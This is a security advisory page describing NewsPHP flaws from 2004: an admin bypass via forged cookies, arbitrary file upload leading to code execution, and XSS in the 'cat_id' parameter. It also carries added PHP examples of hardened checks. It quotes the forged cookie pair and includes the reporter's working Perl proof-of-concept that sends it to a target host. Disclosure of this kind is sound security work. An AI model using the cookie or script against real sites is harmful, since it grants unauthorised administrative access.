SecurityTracker.com
Category:   Application (Forum/Board/Portal)  >   NewsPHP (newsphp.com)
Vendors:   NewsPHP.com
NewsPHP Authentication Flaw Lets Remote Users Gain Administrative Access
SecurityTracker Alert ID:  1009740
SecurityTracker URL:  http://securitytracker.com/id/1009740
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Apr 12 2004
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  

Description:   Manuel Lopez reported several vulnerabilities in NewsPHP. A remote user can gain administrative access on the application. A remote authenticated administrator can upload arbitrary files. Cross-site scripting attacks are also possible.

It is reported that the software does not properly validate user-supplied cookies to authenticate administrative users. A remote user can reportedly supply the following cookie to gain administrative access:

autorized=admin; root=admin

A demonstration exploit script is provided in the Source Message.
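
The trust error described above, as an added example (not NewsPHP's code, which this page does not reproduce): a check that believes the 'autorized' and 'root' cookies, beside one that reads the role from server-side session state written at login. All function names, the 'role' session key and the sample account are assumptions.

```php
<?php
// Added illustration, NOT NewsPHP source. Function names and the
// 'role' session key are hypothetical.

// Weak pattern: the role is whatever the browser claims. Any client can send
// "autorized=admin; root=admin", the cookie pair quoted in this advisory.
function is_admin_from_cookie(array $cookies): bool
{
    return ($cookies['autorized'] ?? '') === 'admin'
        && ($cookies['root'] ?? '') === 'admin';
}

// Hardened pattern: the browser holds only an opaque session ID; the role is
// stored server-side and only after the password has been verified.
function complete_login(array &$session, string $user, string $pw, array $users): bool
{
    $hash = $users[$user]['hash'] ?? null;
    if ($hash === null || !password_verify($pw, $hash)) {
        return false;
    }
    // In a web request, call session_regenerate_id(true) here (session fixation).
    $session['user'] = $user;
    $session['role'] = $users[$user]['role'];
    return true;
}

function is_admin_from_session(array $session): bool
{
    return ($session['role'] ?? '') === 'admin';
}

// Constructed demo data for a CLI run: one admin account, one forged cookie jar.
$users   = ['editor1' => ['hash' => password_hash('constructed-pw', PASSWORD_DEFAULT), 'role' => 'admin']];
$forged  = ['autorized' => 'admin', 'root' => 'admin'];
$session = [];   // stands in for $_SESSION after session_start()

var_dump(is_admin_from_cookie($forged));    // weak check, forged cookies
var_dump(is_admin_from_session($session));  // hardened check, no login yet
complete_login($session, 'editor1', 'constructed-pw', $users);
var_dump(is_admin_from_session($session));  // hardened check, after a real login
```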

It is also reported that a remote authenticated administrator (or a remote user that has exploited the above described authentication vulnerability) can invoke the File Upload feature to upload arbitrary files instead of video files. The remote user can then load a URL to cause the uploaded file to be executed by the web server with the privileges of the web server.
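
A server-side check for the upload path described above, as an added example (not NewsPHP's code): the file is classified by its content, stored under a server-chosen name and extension, and kept in a directory that is assumed to be outside the web root or served with script execution disabled. The function names, the allowlist and the paths are assumptions.

```php
<?php
// Added illustration, NOT NewsPHP source. Names, allowlist and paths are hypothetical.

const VIDEO_TYPES = [            // detected MIME type => extension we assign
    'video/mp4'       => 'mp4',
    'video/webm'      => 'webm',
    'video/quicktime' => 'mov',
];

// Returns the extension to store under, or null if the content is not an
// allowlisted video. The client-sent file name and type are never consulted.
function video_extension_for(string $path): ?string
{
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($path);
    return is_string($mime) ? (VIDEO_TYPES[$mime] ?? null) : null;
}

// $storeDir is assumed to be outside the document root, or served with script
// execution disabled: content sniffing alone can be fooled by a file that
// starts like a video and carries code further in.
function store_video(string $tmpPath, string $storeDir): string
{
    $ext = video_extension_for($tmpPath);
    if ($ext === null) {
        throw new RuntimeException('rejected: not an accepted video type');
    }
    $name = bin2hex(random_bytes(16)) . '.' . $ext;   // server-chosen name
    $dest = rtrim($storeDir, '/') . '/' . $name;
    // In a request handler, use move_uploaded_file($_FILES[...]['tmp_name'], $dest).
    if (!rename($tmpPath, $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0640);
    return $name;
}

// Constructed input for a CLI run: a script submitted in place of a video.
$tmp = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($tmp, "<?php echo 'constructed sample'; ?>");
try {
    store_video($tmp, sys_get_temp_dir());
} catch (RuntimeException $e) {
    echo $e->getMessage(), "\n";
    unlink($tmp);
}
```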

It is also reported that the software does not properly filter HTML code from user-supplied input in the 'cat_id' parameter. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the NewsPHP software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit URL is provided:

/index.php?cat_id=[XSS]

The vendor was reportedly notified on April 3, 2004.

Impact:   A remote user can gain administrative access on the application.

A remote authenticated administrator can upload arbitrary files to the target system and execute them with the privileges of the web server.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the NewsPHP software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.newsphp.com/
Cause:   Access control error, Authentication error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Apr 16 2004 (Vendor Issues Fix) NewsPHP Authentication Flaw Lets Remote Users Gain Administrative Access
A fix is reportedly available.



 Source Message Contents

Subject:  XSS, Admin Access via Cookie and File Upload vulnerability in NewsPHP.


#Title: XSS, Admin Access via Cookie and File Upload vulnerability in
NewsPHP.

#Software: NewsPHP (All versions)
#Vendor: http://www.newsphp.com
#Underlying OS: All


#Description:

NewsPHP is a perfect solution for creating a web publishing system, like an
online magazine, newspaper, TV/Radio or news portals. It also works as a
Content Management System that is easy to install and manage without having
to FTP upload your pages every time you need to update it.


#Vulnerabilities:

A security vulnerability in the product allows attackers to cause the
product to think they are administrators by placing a fake Administrator
cookie on their computer.

A File Upload vulnerability in the Admin panel allows authenticated users
to upload arbitrary files instead of a video file.

This product also is vulnerable to the Cross-Site Scripting vulnerability.


#Cookie Vulnerability#

The flaw is caused because cookie data is not properly checked for
administrator rights.

This is the cookie and POC to gain administrator privileges in newsPHP:

### autorized=admin; root=admin ###


## PROOF OF CONCEPT (Admin Access via Cookie in NewsPHP) ##------------

#!/usr/bin/perl -w
## Example: POCnws.pl www.vulnerweb.com newsadmin POCnws.htm

use IO::Socket;
if (@ARGV < 3)
{
print "\n\n";
print "PROOF OF CONCEPT (Admin Access via Cookie in NewsPHP)\n\n";
print "Usage: POCnws.pl [host] [directory] [file.htm]\n\n";
print "By: Manuel Lopez mantra at gulo.org\n";
print "\n\n";
exit(1);
}

$host = $ARGV[0];
$directorio = $ARGV[1];
$fichero = $ARGV[2];

print "\n";
print "----- Conecting .. <====\n\n";
$socket = IO::Socket::INET->new(Proto => "tcp",
PeerAddr => "$host",PeerPort => "80") || die "$socket error $!";
print "====> Conected\n";
print "====> Sending Data .. \n";
$socket->print(<<fin) or die "write: $!";
GET http://$host/$directorio/ HTTP/1.1
Cookie: autorized=admin; root=admin

fin
print "====> OK\n";
print "====> Generating $fichero ...\n";
open( Result, ">$fichero");
print Result while <$socket>;
close Result;

##--------------------------

#Cross-Site Scripting#

A remote user can conduct cross-site scripting attacks due to an input
validation flaw in the cat_id variable.

/index.php?cat_id=[XSS]


#File Upload vulnerability#

A user with privileges can upload executable code instead of a video in the
Administration Panel. Once the code has been uploaded, a user can execute
the code by calling the file; it will be executed with the privileges of
the web server.


#Solution:

There is no solution at the moment.
Vendor contacted Apr 3 2004

#Credits:

Manuel Lopez, mantra@gulo.org


 
 



Copyright 2019, SecurityGlobal.net LLC